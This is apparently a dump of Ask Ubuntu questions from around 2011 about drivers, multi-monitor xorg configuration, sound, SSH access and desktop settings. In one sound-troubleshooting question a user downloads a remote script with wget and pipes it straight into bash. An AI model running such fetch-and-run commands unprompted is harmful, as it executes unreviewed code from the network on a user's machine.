[ 1 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 1 ] -1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -1 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` aticonfig-device [ 1 ] -0 '' driver `` fglrx '' busid `` pci:2:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 1 ] -1 '' driver `` fglrx '' busid `` pci:2:0:0 '' screen 1 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -1 '' device `` aticonfig-device [ 0 ] -1 '' monitor `` aticonfig-monitor [ 0 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 1 ] -0 '' device `` aticonfig-device [ 1 ] -0 '' monitor `` aticonfig-monitor [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 1 ] -1 '' device `` aticonfig-device [ 1 ] -1 '' monitor `` aticonfig-monitor [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection this upon reboot renders all monitors blank and i have to go into recovery mode and use a failsafe driver . this is so much harder than i thought it would be , i do n't think ubuntu likes ati for multi ( 3 ) monitors or maybe the other way around . can anyone help still ?
43895	how do i install the nvidia driver for a geforce 9300m ?	yesterday i 've installed ubuntu 11.04 ( instead of 10.10 ) . and i need to install nvidia driver which supports opengl 3.3 in 10.10 i did it in a such way : ctrl+alt+f1 login sudo /etc/init.d/gdm stop sudo sh driver.run startx not it does n't work . because ctrl+alt+f1 does n't show login screen . just only black screen . i 've googled this problem . some people have it but no one knows how to solve . sometimes people say that it is connected with video card or driver . but i have geforce 9300m g , and i 've activated a standard driver . anyway , it worked in 10.10 , but does n't work now . the main problem is that i need to kill xserver to install this driver . killing the process just only restarts xserver . also , i 've tried to /etc/init.d/gdm stop in gui-console . it says that `` fake initctl , doing nothing '' . google did n't helped in this case too . any ideas to install that driver ?
43899	/home partition not recognized	i upgraded to 11.04 with a cdrom . after the installation my home is empty and my installed apps are lost . everything in /usr/bin etc . has been reset back to the initial state . my /home is on a separate partition and natty did n't recognize it . how do i get my configuration back ?
43901	hide the taskbar in virtualbox 's seamless mode	i just wanted to ask if there was a way to hide the taskbar when running virtualbox in seamless mode . i only want it to run photoshop and occasionally ms office , i do n't need the start bar getting in the way , taking up valuable screen real-estate . i have set it to autohide , but that it can be a bit glitchy , for example , sometimes if i swap window the taskbar will then stay up until i go back to the windows program and then leave again . that and it can be irritating when i just want to click on something near the bottom of the screen and it pops up . edit : i just had an idea as to how to the solve this but the site wo n't let me answer my own question with 8 hours of posing it , but here 's the answer i came up with anyway . i realised i was going about it in the wrong way ; looking at the problem as an ubuntu problem or a virtualbox problem , then i realised it was really a windows problem , since you can't remove the taskbar in windows . then i had an idea . i found a program that changes the delay for autohide so it's so long that i never trigger it accidentally . in case any one has the same problem , the program is taskbar activate , located here : http : //home.nordnet.fr/pmdevigne/taskbaractivate.html . it 's not designed for the new windows oses but with a bit of tweaking it works . i unticked the âget back the bar in the background when it is no more in useâ under the `` activation '' tab in the setting dialogue and then everything seemed to work .
43904	no lightning calendar on pc for thunderbird 3.1 but available on my net-book	i am a recent convert to linux and delighted that thunderbird 3.1 is available in ubuntu 11.04 , but i ca n't install the excellent lightning calendar add-on which i find so useful onto my desktop pc [ on thunderbird/about thundebird , the set is 'mozilla/5.0 ( x11 ; u ; linux x86_64 ; en-us ; rv:1.9.2.17 ) gecko/20110424 thunderbird/3.1.10 ' ] . confusingly , my net-book which also runs exactly the same software has lightning as part of thunderbird [ my notebook set up is mozilla/5.0 ( x11 ; u ; linux i686 ; en-us ; rv:1.9.2.17 ) gecko/20110424 lighning/1.ob2 thunderbird/3.1.10 ' ] , so why ca n't i get the add-on for my desktop ? any help appreciated . andy t
43905	banshee is unable to determine audio cd metadata	i tried to add a audio cd to my music pool . when i enable the `` audio cd support '' extension the following output where posted via debug-mode . now when i take a look to the cd , i realised that banshee was not able to fetch the metadata . [ 1 debug 19:05:59.889 ] mapping audio cd ( /devices/pci0000:00/0000:00:0a.0/host4/target4:0:0/4:0:0:0/block/sr0 ) [ 1 debug 19:05:59.890 ] extension service started ( audiocdservice , 0,054336 ) [ 6 info 19:05:59.892 ] querying musicbrainz for disc release ( uuz7wmxmyufmrfja4v7ulj1zbj8- ) [ 6 warn 19:06:00.842 ] caught an exception - system.nullreferenceexception : object reference not set to an instance of an object ( in `banshee.audiocd ' ) at banshee.audiocd.audiocddiscmodel.loaddiscmetadata ( system.object state ) [ 0x00000 ] in < filename unknown > :0 [ 6 info 19:06:00.842 ] query finished ( success : false , 0,94958 seconds ) banshee reports : ( - ) could not fetch track information due to the fact that abcde was able to fetch the metadata and the audio cd is `` adele 21 '' ( so well known ) i thought that there has to be a fault on my or banshee 's side . i found no extension which seems to be important for that . any ideas ?
43906	why is my unity theme going haywire ?	i have this new problem , my unity theme falls back to some old gnome theme which makes the whole look and feel absolutely horrible . here is the screenshot right after login : and after sometime , theme changes to this : any idea how to fix this ?
43908	evolution 's outgoing mail does n't support correct authentication type	i 'm trying to get my email set up at work , but i 'm running into an issue with the outgoing mail preferences . i can receive email , but none of the options for authentication type in the `` sending email '' settings are what i need . according to the staff website , i need `` password '' authentication , but that is n't in the dropdown . the `` check supported types '' button does n't do anything . i tried all the options in the dropdown , but all are rejected . any ideas ? thanks in advance .
43911	jhbuild will not continue git downloads	i have been trying to install gnome 3 on my 10.10 . i read this tutorial and am using jhbuild to install the 41 required packages . jhbuild apparently pulls the required packages using git and wget . i have been experiencing awful internet connectivity for the past couple of months . i have complained , but my isp does not really bother , plus i do n't get time to bother . the point is whenever jhbuild comes around to pull down gtk+ 3.0 ( or some other package ) using git , my internet connectivity goes down long enough to get a from 192.168.1.1 icmp_seq=1130 destination host unreachable from 192.168.1.1 icmp_seq=1131 destination host unreachable it invariably comes up after a few such lines , however jhbuild refuses to continue . i either have to manually restart the phase or wait till jhbuild returns an error . in both cases jhbuild starts downloading the files from scratch for that particular package . does git not support download resuming ? plus , i have installed gtk+ 3.0.9 ( the latest stable release ) , but jhbuild still starts downloading gtk+ 3.0 using git . should i download the unstable release using git ? this is what i often end up with *** checking out gtk3 *** [ 8/41 ] git clone git : //git.gnome.org/gtk+ gtk3 initialized empty git repository in /home/abc/gnome-shell/source/gtk3/.git/ remote : counting objects : 270771 , done . remote : compressing objects : 100 % ( 41632/41632 ) , done . ^c*** error during phase checkout of gtk3 : # # # # # # # # # # error running git clone git : //git.gnome.org/gtk+ gtk3 *** [ 8/41 ] [ 1 ] rerun phase checkout [ 2 ] ignore error and continue to configure [ 3 ] give up on module [ 4 ] start shell [ 5 ] reload configuration [ 6 ] go to phase `` wipe directory and start over '' choice : 1
43912	why is spotify ( wine ) so slow ?	i 'm using unity and wine1.3 . spotify installs fine , but every click in the window slows the whole system down incredibly for a few seconds . system monitor shows that suddenly xorg starts using ~50 % cpu . i 'm also using nvidia prop . drivers , but this issue probably has more to do with wine/unity
43914	how do i make empathy stop formatting my text ?	i paste code and formatted ( mysql results , program output , stacktraces ) snippits through empathy many times a day . empathy always thinks it 's doing me a favor by trimming each line as if it were plain html in need of html style whitespace removal . how can i make empathy stop treating my text as span and start treating it like pre ?
43915	with two simultaneous users , how much memory is consumed ?	basically , it 's my personal system ( running 10.10 ) where i often switch from myself to my other myself ( one login is for personal purposes , and the other one is the working login ) . so i come to situation that both myself are logged onto the system because i want to switch between accounts quickly . does anyone know how much memory has been consumed in such work ? i have n't noticed any slowdowns , but i would like to know that . is there any ubuntu official document describing this ?
43918	using ubuntu classic window manager from usb drive	i am using ubuntu 11.04 from a live usb disk . i created some space on the usb for saving modifications during installation to the usb . i want the default window manager to be ubuntu classic . how can i do this ?
43925	how to configure movie player ( totem ) to append to playlist instead of replacing it	for instance , a right-click on media files in nautilus could offer a `` add to media player playlist '' entry .
43928	monitor or watch a process and restart if it goes down	i have a worker program which i start in rc.local . the program is not the most stable in the world so i would like to set up a watcher of some kind that checks to see if the aforementioned program is chugging along and if not , start up the program again . i can imagine a couple of ways to do this , although i am sure there are more : have a cron job that runs and looks for the running program . if there , it stops , otherwise it fires off another instance of the program run a dedicated monitoring program that runs all the time and polls frequently to see if the program is running . do any of you have examples of either of these implementations or recommendations on how i should do this ?
43930	why does the sound icon turn blue sometimes ?	the sound indicator icon turns blue sometimes : what does this mean ?
43939	macbook crashes due to overheating ?	i 've got a macbook 6,1 with natty installed , and occasionally , usually when i 'm doing something intensive , the display freezes up and becomes totally unresponsive , while the lat 2 seconds of audio loop over and over . when i reboot immediately after , however , the problem occurs again much more quickly . this , and the fact that i 've never heard the fan running ( though it does so infrequently under os x ) leads me to believe that something inside is overheating . any ideas ?
43942	how to change ubiquity release name	i want to build a custom distribution , how can i change the release name in ubiquity installer ? ( where it says `` try ubuntu '' and `` install ubuntu '' )
43950	how can i apply a ladspa plugin to a pulseaudio stream ?	i want to apply a ladspa plugin to everything that streams through the default pulseaudio sink . how should i set this up ?
43954	how to add packages to ubuntu 11.04 install dvd ?	how can i add packages to the original ubuntu install dvd . i 'm studing math at university so after installing ubuntu on my pc i downloaded math packages from the ubuntu repositories and i try to add debs to dvd but i ca n't . i use aptoncd but it creates a second dvd i only want a all my debs in one dvd . i used uck but it only add packages in live session . i want to add all my debs and install in other pc with my math packages . is there any way ?
43955	best practices to ease the os upgrade procedure	i 'm going to install a fresh ubuntu 10.04 ( lts ) , supported until april 2013 . my question is about the upgrade to the new lts version , and in particular i 'd like to know which best practices i have to adopt to reduce potential upgrade issues when 12.04 will be released . for example , do n't install packages from unofficial repositories , etc . i 'll appreciate any thoughts on this . thanks .
43957	drivers for a lexmark x4690	have anyone got a lexmark x4690 to work under ubuntu ? or is the only option to install windows on a vm ?
43959	how can i change the scrollbar 's background color for theme ?	i scanned the /home/ry/.themes/elementary-borderless/metacity-1/metacity-theme-1.xml file and did n't spot anything . where else can i look ?
43962	live usb faster than full install	when i run 11.04 from a usb flash drive , it works the way i suspect it should - quick and responsive . with a full install , on the other hand , i click the home button and i have to wait four seconds to see the dash ( this is insane - i have a core i5 ) . same thing with alt+f2 . i 've also tested the live usb on an older laptop with inferior specs and it still runs faster than my full install . what 's going on ? how do i fix this ?
43963	can the unity panel calendar show my local public holidays ?	i 'm a kubuntu user moving to unity , one nice feature that the kde panel calendar ( the one that pops up when you click on the clock ) had is that it indicated my local public holidays . i think each holiday had a red square around it and when you clicked on it it showed the name of the holiday . can this be set up with for the unity panel calendar ?
43964	why ca n't i create menu separators ?	for some reason , i am unable to add separators to the menu in ubuntu classic . is this feature broken , or is there something wrong ?
43966	why update manager does n't use indicators ?	informing about system updates seems like a perfect match for an indicator ( it could appear or change color when there are new updates ) . instead of that we have an annoying popup window , which demands immediate attention . i can not imagine that nobody thought about that before , and it does n't seem difficult to implement , so i assume there has to be a reason behind that ?
43967	formatting pen drive causes 'daemon is inhibited ' error	am trying to format a drive with disk utility and everytime i try to format this pen drive i get 'daemon is inhibited ' error . how can it be solved since the pen drive works on other pcs with no problem . update the device is not mounted . the device is one of those usb pen drives with u3 support . it is a sandisk 8gb pen drive with fat32 partition .
43969	how to make ubuntu remember forever the password after the first time	is it possible to make ubuntu remember the password for any program after the first time it asks . i get asked for the password for synaptic , for making a usb bootable , for connecting to the wifi network , for opening gparted and even to go to the bathroom . is there a way to just tell it to ask once forever or just tell it to not ask ( without going to root account . i want to keep using my own account )
43971	is blu-ray writing support reliable yet ?	blu-ray writers have reduced in price a lot recently , but there are few success stories on the web about writing blu-ray disks using ubuntu ( and the same goes for gnu/linux in general ) . are any of the new low-cost blu-ray writers supported ? can anybody confirm that they 've personally used them with success ? what software did you use ( i 'm most interested in tools that operate at the hardware/protocol level , such as growisofs , rather than the gui tools that wrap them ) ?
43972	internet extremely slow on a ralink 2501usb	well everyone , after a long and through investigation into this it looks like i 'm going to have to call it quits on this one . i 've done just about everything suggested both from this site , and google , but i seem to have no luck on this issue . i think ubuntu just does not like the card that i have . oh well , being a penny pincher has it 's downsides . i 'm looking into getting a new wireless card soon . time elapsed for ping test to connect = 10s . time elapsed for download test to connect = 6s . time elapsed for upload test to connect = 27s . windows xp x86 time elapsed for ping test to connect = 3s . time elapsed for download test to connect = 2s . time elapsed for upload test to connect = 6s . bus 001 device 003 : id 148f:9021 ralink technology , corp. rt2501usb wireless adapter bus 001 device 002 : id 0bda:0151 realtek semiconductor corp. mass storage device ( multicard reader )
43979	switching to chrome in 11.10 ?	i just read an article that said ubuntu is switching to chrome for 11.10 . is this true and if so , is it going to be chrome or chromium ? ? ?
43982	accessing my windows 7 files from my ubuntu account	i have just installed ubuntu on my computer and i have windows 7 as my other operating system . is there a way that i can access my windows 7 files from my ubuntu installation ?
43983	what is the application of jre in libreoffice ?	initially when i installed natty , jre was not installed for libreoffice . later i came to know installing jre i.e. , libreoffice-java-common will lead to performance improvements . so installed it and in lo options selected enable java runtime . but i noticed a heavy degradation in the performance . lo was taking more time to load , scrolling through pages became very slow and what not ! so now i wonder what purpose does jre in lo serve ?
43984	how to configure my ge wireless mouse ?	i just upgraded to natty , i 've a dell inspirion 1300 , working faily well , but after the dist-upgrade my general electric wireless mouse ( 97663 rev.s3 ) stoped working . it uses an usb dongle to recieve the wireless signal . hope you can help me . dmesg output : [ 0.960074 ] usb 3-1 : new low speed usb device using uhci_hcd and address 2 [ 1.525698 ] input : mosart wireless mouse as /devices/pci0000:00/0000:00:1d.1/usb3/3-1/3-1:1.0/input/input4 [ 1.526340 ] generic-usb 0003:062a:6301.0001 : input , hiddev0 , hidraw0 : usb hid v1.10 mouse [ mosart wireless mouse ] on usb-0000:00:1d.1-1/input0 [ 1.526557 ] usbcore : registered new interface driver usbhid [ 1.526560 ] usbhid : usb hid core driver lsusb -v output : bus 003 device 002 : id 062a:6301 creative labs device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x062a creative labs idproduct 0x6301 bcddevice 1.00 imanufacturer 1 mosart iproduct 2 wireless mouse iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 34 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 4 hid-compliant mouse bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 1 boot interface subclass binterfaceprotocol 2 mouse iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 168 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10 device status : 0x0000 ( bus powered )
43986	how can i disable caps lock on text-mode ( tty ) terminals ?	i have disabled caps lock in ubuntu via the system settings - > keyboard panel ( see how to programmatically swap the caps lock and esc keys ? on how to find this option ) , however when i switch to a text-mode tty terminals ( through ctrl + alt + f1 ) caps lock is no longer disabled . i use these text-based terminals a fair amount - is there a way to completely disable caps lock , even on these terminals ?
43990	asogiate wo n't work on 11.04 . how do i fix that ?	asogiate is a filetype editor ( mime ) , and on 11.04 if gives an error about the database being malformed , then wo n't work . how do i get around this ?
43991	no sound on a studio xps 1647	i just installed ubuntu 11 server with lxde . i found that there was no sound . what do i do ? following sound troubleshooting jm @ jm-laptop : ~ $ gnome-volume-control ** ( gnome-volume-control:8750 ) : warning ** : connection failed , reconnecting ... jm @ jm-laptop : ~ $ sudo aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 jm @ jm-laptop : ~ $ find /lib/modules/`uname -r` | grep snd /lib/modules/2.6.38-8-server/kernel/sound/pcmcia/vx/snd-vxpocket.ko /lib/modules/2.6.38-8-server/kernel/sound/pcmcia/pdaudiocf/snd-pdaudiocf.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/snd-cs8427.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/snd-i2c.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/other/snd-ak4117.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/other/snd-ak4114.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/other/snd-pt2258.ko /lib/modules/2.6.38-8-server/kernel/sound/i2c/other/snd-ak4xxx-adda.ko ... jm @ jm-laptop : ~ $ lspci -v 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) subsystem : dell device 0419 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : cfe00000-cfefffff prefetchable memory behind bridge : 00000000d0000000-00000000dfffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0419 flags : bus master , medium devsel , latency 0 , irq 16 memory at f0b05800 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd ... jm @ jm-laptop : ~ $ wget -o alsa-info.sh http : //alsa-project.org/alsa-info.sh & & bash ./alsa-info.sh ... your alsa information is located at http : //www.alsa-project.org/db/ ? f=711f054c4abd11e4c5570d5f7c315982f9d147e7 the contents of the url http : //pastie.org/1929819 now what ?
43992	does unity support dual monitors ?	i just did a clean installation of natty on my laptop , and i must say it is fantastic ! i was apprehensive about unity at first , but i have very quickly changed my mind . now with that said , my laptop is my testing machine , and my desktop is my super-stable-don't-change-anything machine . i 'm impressed with the usability and stability of unity on my laptop , but my desktop uses dual monitors and i 'm not sure how well that is supported at the moment . does anyone have any comments on using 11.04 with dual monitors and how well it will work ? first hand experiences or very recent links ? all the research i have done on my own has only led to old ( october ) posts , and bug reports that appear to have been fixed so i would like to know from people who are actively running the final release of 11.04 . my graphics card is an nvidia gtx 460 , which has been well supported on 10.04 and 10.10 . also my primary ( slightly larger ) monitor is to the right , but i 'm not picky about which one i stare at .
43993	ubuntu - any good method to know which package contains the specified app ?	my mount utility does n't support ext4 , so i plan to update it . how to determine which package contain an app , such as mount ? sudo apt-get install
43998	best practice to keep a ntfs partition constantly mounted ?	hey all , i dual-boot using a ntfs partition to house shared docs and some program files between windows and ubuntu . when this extra media partition is n't mounted automatically at startup it causes usability problems . in the past i have installed and used `` ntfs configuration tool '' to achieve this . since i just cleanly installed ubuntu 11.04 , i thought it would be fitting to ask if anyone has found a better method ?
43999	how to change the date format ?	presently the date is showing as mmm dd hh : mm : ss . is there any way that i can change it to as per my liking . for example : dd mmm , hh : mm : ss .
44000	how can i view a live volume meter ?	i want visual feedback of the sound that is currently coming out of the computer . how can i view a live volume meter ?
44008	10gbe on ubuntu 10.04 lts desktop and virtualbox	i am aware that there is support for 10gbe on ubuntu server , but is there also support in desktop version ? i do n't see why not , but i would like to confirm before purchasing an expensive nic . second question is , does virtualbox currently support using host 's 10gbe ? i have tried searching around , and it looks like vmware esx-i does , but i 'm not too certain about virtualbox . thank you !
44009	usb device name	i would like to know if the usb device name is randomly allotted at every reboot in an eeepc netbook with ubuntu ( hardy heron ) . what bugs me is that while i transmit some serial data over say ttyusb0 , suddenly the device loses its name and my `` dmesg '' shows the name to be altered to say ttyusb1 . i s this a bug in ubuntu ? or can it be manually `` fixed '' - as in a particular usb port can be mapped to a particular name . any help ?
44015	re : periodic keyboard lag/delay	sorry , but i do n't know how else to respond to this question ( the original is locked from new users ) ... periodic keyboard lag/delay i had the same problem with my lenovo x61 laptop running xubuntu 11.04 . after some experimentation i found that this only occurs when using xterm . try using a different terminal like gnome-terminal or xfce4-terminal .
44019	do n't wait for user input on errors while booting	i 'm running 11.04 server , headless , and at a certain point it did n't boot anymore : it just stopped . it seems like i made a mistake with some of the disks , the fstab or the raid config , anycase one of the arrays could n't be mounted . what happens is that there is some fancy screen ( too fancy for my old lcd , but that 's another question ) saying could n't mount /foobar . press s to continue or [ .. ] . what i want is that it continues automatically . if i reboot i should check if that worked , fine , but i do n't want to guess what button to press for it to continue , and i certainly do n't want to have to run it with some sort of screen . obviously , if / fails to mount then moving on is kinda hard to do . ok . i get it , but when some raid does n't come up , i have to boot to fix it . how can i have ubuntu server 11.04 skip all but the fatal errors ?
44021	how to connect to homepage after creating it with a python webframework ( hyde ) from an other machine in the same network ?	i created a website on a server with hyde . after installing hyde on a ubuntu machine , i followed these steps : temrinal : $ hyde -s /path/to/mysite create $ cd /path/to/mysite $ hyde gen $ hyde serve the server starts , and shows no problems ( , yet ^^ '' ) . the thing is : the server has no gui , and there fore no browser ( except terminal browsers ) . therefore i want to connect to this created page from another ubuntu machine ( my pc i work with ) , which is in the same network . i read up about the documentation of hyde and i got this information , to specify the ip and the port the site should be available on : -a address , -- address address the address to serve the website . optional - defaults to localhost -p port , -- port port the port to serve the website . optional - defaults to 8080 the following command will serve the website at http : //localhost:8181 . terminal : $ cd ~/test $ hyde serve -p 8181 which are the settings i have to set on the ubuntu gui-less server , to get me mysite reachable from the my ubuntu machine which has a gui ? perhaps i should mention , that both server are in the intranet of the company where i work . this is only a test for me to get this running and to be able to start to throw a website together . later on i want to get this site running with apache , and not using the provided webserver of hyde . but that is another questin , i think ...
44032	how to make my own ubuntu disc ?	one of my friend dont have internet connection but he wants to try ubuntu . i just want to install all the required packages and plugins in my machine . and i want to make this complete setup with installed packages in a seperate disc and install it in another system . is it possible ?
44034	how to upload a image to deviantart directly from gimp ?	i want to upload a image to da while working on it in gimp . how can i upload an image directly from gimp to deviantart ?
44037	how to upload an image to deviantart directly from inkscape and gimp ?	how can i upload an image directly from inkscape or gimp to deviantart ?
44040	how do i make the panel and window decorations appear on a second monitor ?	64-bit 11.04 installed with the proprietary nvidia ( current ) enabled , all updates applied as of today . i 'm having trouble setting up my second monitor . i have no panel or window decorations on the second monitor . how do i make them appear ? i 'm using the current nvidia proprietary driver with their settings-manager . the second screen configured as a separate x screen , no twinview . this post recommended running metacity -- replace , that brought the window decorations back but killed desktop effects , the panel on my primary monitor , as well as my launcher bar . i tried to grab a screenshot of the second screen , but the image taken was of the primary screen , even though i manually selected a portion on the second monitor ... strange . this post recommends making sure 'window decoration ' is checked in compizconfig settings manager , it is , and has been by default since install . the top answer to this post has it set up with twinview . that does n't work for me , since fullscreen flash video with twinview reverts back to my primary monitor . the second is a hdtv that i will only use for fullscreen video playback .
44041	kubuntu and screen savers	after upgrading to kubuntu 11.4 i am not able to choose any other screen savers than blank screen and random ( which is the same as blank since there are no other screen savers available ) . how can i choose other screen savers ? on my other kubuntu-computer there is a button called get new screen savers or something .
44043	how can i find out , which jar-files java is currently running ( and their pids ) ?	i have a .jar file which is notorious for malfunctions . when a malfunction occurs , only a restart helps . i have a way to detect that malfunctions ( reading the log-file of said .jar ) so i want to write a script , that kills the process whenever the malfunction occurs . the problem is : confus @ confusion : ~ $ ps -a ... 4438 ? 00:00:00 java 4439 ? 00:00:00 java 4443 ? 00:00:00 java ... the process name of all running .jars is naturally `` java '' . how do i find out , which of these `` java '' -processes is the one i want to kill , i.e . the one running foobar.jar ?
44044	how to recall history in teminal	i installed ubuntu 10.10 yesterday . then while using the terminal i noticed that once i quit a terminal session its history is gone , although history exists for applications in terminal like-root ( cern ) history . in giving the command echo $ histfilesize it shows 2000 . i changed that to 10000 when i quit the session and opened a new terminal ; it again shows history as 2000 and no command can be accessed through up/down arrow key . please help . i am getting frustrated with soooo ... . lot of typing in the terrminal .
44048	how do i install the experimental 3d nvidia drivers ?	they used to show up as available for download in jockey/additional-drivers but now the option is no longer there .
44049	apt-get ignoring a repo even if i clear the cache	i 'm trying to get the ubuntugis repo to install on a server and i keep getting the line : ign http : //ppa.launchpad.net/ubuntugis/ubuntugis-unstable/ubuntu/ lucid/main translation-en_gb when i do an apt-get update . this is not correct behaviour . i have cleared the folders /var/cache/apt/ and /var/lib/apt/lists/ so that i can be sure apt-cache should n't be using its local cache but i still have that repo ignored when updating . can someone please tell me what to do to try and troubleshoot this ? i do n't really understand what is wrong and do n't know where to go from here to troubleshoot this .
44050	how can i make a launcher for alt+tab window switcher ?	i 'd like to have an icon on the unity launcher that triggers either the alt + tab or compiz scale behavior . i do n't want to use keyboard shortcuts and want to switch easily between applications using the mouse . it would be great to trigger the compiz scale behavior by clicking an icon on the launcher . is it possible ? what is the actual command that is run when pressing alt + tab ?
44052	how to ssh to live cd for remote recovery - root password issue ?	is there an automatic way to ssh to a machine that booted from live cd ? i have a remote server with a hdd issue and the isp booted my machine from a live cd . i can ssh to the machine ( lucky has the same ip ) but i can not login because i have no password . how can i solve this problem ? if this is not possible , how can i find or configure a cd or usb stick that would allow me to do that .
44054	where can i change shortcut for expo in current workspace only ( alt+shift+up ) ?	i need to change shortcut for `` expo mode for all windows in the current workspace only '' because is in conflict with usual netbeans shortcuts . but i can not find it in ccsm ( compizconfig settings manager ) . can you help me ?
44059	progress bar in scp command	is there any way to display a progress bar while copying from server to local using scp ( or vice versa )
44062	how do i install lxde / lubuntu ?	i want to install lubuntu on my current ( pre-existing ) ubuntu install because of it 's light-weight footprint . can i preserve currently installed apps after installation ?
44064	apllications not starting from launcher	some applications , for example python resourceeditor from the pythoncard-tools package , run correctly if i start tham from terminal . however , when i add them to the launcher and try to open them clicking on the icon , the icon flashes for a while , but the app does not start . any ideas how i can fix this ?
44074	gparted ca n't see partitions on an acer extensa 5420 laptop	i tried to install ubuntu on my acer extensa 5420 laptop . at the point where gparted should allow me to select partitions i could not see my windows partitions with vista and xp installed on them . it was written that the disk has no operating systems installed . after googling i found out that this behavior may be caused by sata drive with suggestions to change settings in bios . my bios does not provide means to change such settings . has anyone here encountered the similar problem ? any suggestions how to install ubuntu ? i have two partitions on my hdd and about 35gb of unallocated space .
44083	can not access ssh server from outside	we are using ubuntu 10.04 lts server.i can ssh access that server from other ubuntu machine in own network . but when we are trying to access the server from out side of lan we are unable to ssh connect.i can give the outputs : starlite @ starlite-laptop : ~ $ nmap -a -t4 192.168.1.46 starting nmap 5.00 at 2011-05-20 14:03 ist interesting ports on 192.168.1.46 : not shown : 996 closed ports port state service version 22/tcp open ssh openssh 5.3p1 debian 3ubuntu5 ( protocol 2.0 ) | ssh-hostkey : 1024 00:12:34:45:56:67:78:89:9070:91 ( dsa ) |_ 2048 5d:96:00:12:34:45:56:67:78:89:90:36:70:91 : a6 ( rsa ) 5001/tcp open apc-agent apc powerchute agent 5432/tcp open postgresql postgresql db 8080/tcp open http apache tomcat/coyote jsp engine 1.1 |_ html-title : apache tomcat service info : os : linux ; device : power-device service detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 8.35 seconds but when nmap from a different global ip the output is starlite @ starlite-laptop : ~ $ nmap 122.xxx.xxx.xxx -p 22 starting nmap 5.00 at 2011-05-20 16:50 ist interesting ports on 122.xxx.xxx.xxx : port state service 22/tcp closed ssh the ssh connection is terminated as shown below - starlite @ starlite-laptop : ~ $ ssh openbravo @ 122.176.65.178 ssh : connect to host 122.xxx.xxx.xxx port 22 : connection refused please help me how can i overcome this problem
44084	fn keys not working on an hp g62 laptop . xev show nothing	from the just beginning my fn keys does n't work . first i was using 10.10 , than upgraded to 11.04 ( clean install ) , but not answer from fn keys . xev output nothing , when i press any of fn+key , also i had some multimedia keys , which both does n't work . i have hp g62 laptop . can somebody help resolvse this ?
44086	differences among weather indicators	to my knowledge there are two different weather applications with indicators for unity -- what are the main differences and which one do you prefer over the other and why ? weather indicator myweather indicator for instance do they support ... any number of cities/locations user chosen/defined services ( yahoo , google , ... ) show `` felt temperature '' show forecasts use popups/notify in addition to the indicator menu show pictograms or just text as indicator warn of rain or other weather changes ( some defined time in advance )
